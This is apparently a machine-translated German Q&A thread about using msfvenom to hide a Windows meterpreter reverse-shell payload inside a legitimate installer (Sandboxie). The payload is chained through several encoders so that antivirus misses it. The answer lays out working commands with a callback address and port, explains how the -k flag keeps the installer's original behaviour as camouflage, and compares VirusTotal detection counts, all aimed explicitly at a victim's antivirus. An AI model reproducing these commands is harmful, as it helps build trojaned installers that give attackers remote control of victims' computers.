it-swarm.com.de

Codieren Sie eine ausführbare Datei mehrmals mit MSF venom)

Ich versuche, die ausführbare Datei mehrfach zu codieren, aber mit der Syntax verwechselt.

Das Problem:

Um eine ausführbare Datei zu codieren, können wir die folgende Syntax verwenden:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Jetzt möchte ich eine andere ausführbare Datei/dieselbe Datei codieren. mehrfach mit verschiedenen Encodern.
Syntax, die ich verwende:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x  /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

Ich fand dies Thread und implementierte dann die obige Syntax. Die von ihr generierte Ausgabedatei enthält jedoch nicht die enthaltene ausführbare Datei. Da die Ausgabegröße der ersten Syntax 19 MB und der zweiten Syntax 76 KB beträgt.

Meine Frage ist also, wie ich mehrere Codierungen in dieselbe ausführbare Datei implementieren kann.

5
neferpitou

Wie wir wissen, hilft die Codierung nicht allzu sehr beim Ausweichen von AV, aber ich habe einige interessante Ergebnisse erzielt, nachdem ich einige Dinge ausprobiert habe. Wenn wir den AV-Namen auf dem Computer des Opfers kennen, können wir unser Glück mit dieser Methode versuchen.

Methode eins:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

Ich habe Sandboxie für diese Methode verwendet und es hat eine 9-MB-Datei in eine 17,9-MB-Datei konvertiert. Dann hochgeladen auf VirusTotal. (enter image description here

Auf dem Screenshot sehen Sie AV wie Avast, eScan und ESET, die es als Trojaner scannen konnten. Nur wenige AV haben es jedoch nicht erkannt, wie unten gezeigt.

(enter image description here

Jetzt kommt die zweite Methode , die ich in der Frage gestellt habe: "Codiere eine ausführbare Datei mehrmals mit MSF venom"). Schließlich konnte ich es implementieren und fand ein aufregenderes Ergebnis.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

Die Syntax unterscheidet sich ein wenig von dem, was ich oben in der Frage erwähnt habe, aber es hat funktioniert. Die endgültige Datei, die generiert wurde, war nur mit 17,9 MB identisch mit der vorherigen Datei. Die neu generierte Datei verhält sich aufgrund des Flags "-k" genauso wie die ursprüngliche Software. Das Ergebnis von VirusTotal war das gleiche wie zuvor, aber ich war erfolgreich bei dem, was ich implementieren wollte.

Wenn wir das "-k" -Flag aus der letzten Syntax entfernen, wird die exe-Datei mit 9 MB generiert und das Symbol entspricht der ursprünglichen Software, dh Sandboxie, verliert jedoch die ursprüngliche Funktionalität (nach dem Öffnen der Datei geschieht beim Entfernen nichts mehr) - k "-Flag, da es die gleiche Größe wie das Ps-Symbol der Originaldatei hat, sieht es auch so aus, als würden die gleichen Leute es ausführen. Aber als ich es auf VirusTotal hochgeladen habe, habe ich ein interessantes Ergebnis gefunden, wie unten gezeigt. (enter image description here

Welches ist genau das Gegenteil von oben Ergebnis.

3
neferpitou